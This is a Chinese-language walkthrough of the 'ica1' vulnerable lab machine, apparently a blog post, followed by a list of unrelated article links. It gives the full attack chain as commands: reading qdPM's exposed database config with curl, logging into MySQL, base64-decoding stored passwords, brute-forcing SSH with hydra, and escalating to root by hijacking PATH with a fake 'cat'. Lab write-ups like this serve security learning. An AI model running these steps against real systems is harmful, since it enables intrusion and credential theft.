ica1靶机练习

使用vb打开虚拟机,选择桥接模式,kali也选择桥接

开机后会出现靶机ip,ip会时不时的变,命令不行,记得看一下ip是否变了

先扫描一下开放了哪些端口

nmap -p- 172.16.2.41

访问80后发现是个登录页面

是一个框架系统,版本为9.2

在kali中搜索看看这个框架有没有漏洞

要登录的话,我们查看第二个漏洞,密码相关

下载查看

翻译

我们到这个网址查看,下载文件

curl http://ip/core/config/databases.yml

给出了mysql的账号和密码,前面也看到开放的端口有3306,也就是mysql服务启动了

尝试进入数据库 正常登录会提示证书不符,后面加一句跳过

mysql -h 172.16.2.47 -u qdpmadmin -p --skip-ssl

在staff中,找到了用户名密码

密码是经过加密的,我们去base64解密

c3VSSkFkR3dMcDhkeTNyRg==

N1p3VjRxdGc0MmNtVVhHWA==

WDdNUWtQM1cyOWZld0hkQw==

REpjZVZ5OThXMjhZN3dMZw==

Y3FObkJXQ0J5UzJEdUpTeQ==

suRJAdGwLp8dy3rF

7ZwV4qtg42cmUXGX

X7MQkP3W29fewHdC

DJceVy98W28Y7wLg

cqNnBWCByS2DuJSy
Smith

ucas

Travis

Dexter

Meyer

使用hydry爆破一下,先写两个文件user和passwd作为字典

hydra -L user -P pass ssh://172.16.2.54

22ssh host: 172.16.2.54 login: travis password: DJceVy98W28Y7wLg

22ssh host: 172.16.2.54 login: dexter password: 7ZwV4qtg42cmUXGX

登录一下

ssh travis@172.16.2.54

ssh dexter@172.16.2.54

查看具有SetUID权限的可执行的文件

find / -perm -4000 2>/dev/null

使用strings命令查看一下get_access

发现cat命令提权

配置环境变量

echo "/bin/bash" > /tmp/cat

export PATH=/tmp:$PATH

chmod +x /tmp/cat

ehco $PATH

/opt/get_access

相关推荐
大耳朵-小飞象4 小时前
智能调光4巨头争霸!轨道照明如何破局?
运维·智慧城市·智慧路灯·智能照明·楼宇智控·0-10v调光模块
sanzk4 小时前
firefly开发板ubuntu安装ros2下的micro-ROS Agent
linux·运维·ubuntu
努力进修6 小时前
Docker+cpolar 实战:打造灵活可控的远程办公系统
运维·docker·容器
其实防守也摸鱼6 小时前
运维--怎么看接口的请求和返回
运维·学习·网络安全·网络攻击模型·burpsuite·攻防对抗·蓝队
weixin_307779137 小时前
Linux下Nginx故障系统化检查Shell脚本
linux·运维·服务器·nginx·自动化
skyutuzz8 小时前
node安装部署
linux
一次旅行8 小时前
【AI工具】Rust-Based CLI:用 xargs 和并行加速你的 Linux 日常
linux·开发语言·rust
山峰哥9 小时前
数据库工程与索引策略实战指南‌
服务器·数据库·sql·oracle·深度优先
jieyucx9 小时前
Docker 入门第一阶段:建立正确认知与初体验
运维·docker·容器
2501_9259633811 小时前
Hi3516CV610 + MPU6050 DMP 软件 EIS 防抖笔记
linux·运维·服务器